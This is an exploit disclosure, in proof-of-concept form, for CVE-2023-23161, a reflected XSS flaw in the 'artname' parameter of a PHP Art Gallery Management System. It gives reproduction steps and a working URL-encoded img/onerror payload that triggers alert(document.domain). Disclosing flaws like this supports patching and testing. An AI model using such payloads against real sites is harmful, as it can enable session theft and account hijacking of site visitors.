# Exploit Title: Art Gallery Management System Project v1.0 - Reflected Cross-Site Scripting (XSS)# Date: 20/01/2023# Exploit Author: Rahul Patwari# Vendor Homepage: https://phpgurukul.com/# Software Link: https://phpgurukul.com/projects/Art-Gallery-MS-PHP.zip# Version: 1.0# Tested on:XAMPP / Windows 10# CVE :CVE-2023-23161# Proof of Concept:# 1- Install The application Art Gallery Management System Project v1.0# 2- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=3&&artname=prints# 3- Now Insert XSS Payload on artname parameter.
the XSS Payload:%3Cimg%20src=1%20onerror=alert(document.domain)%3E
# 4- Go to https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E# 5- XSS has been triggered.# Go to this url "
https://localhost.com/Art-Gallery-MS-PHP/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E
"
XSS will trigger.
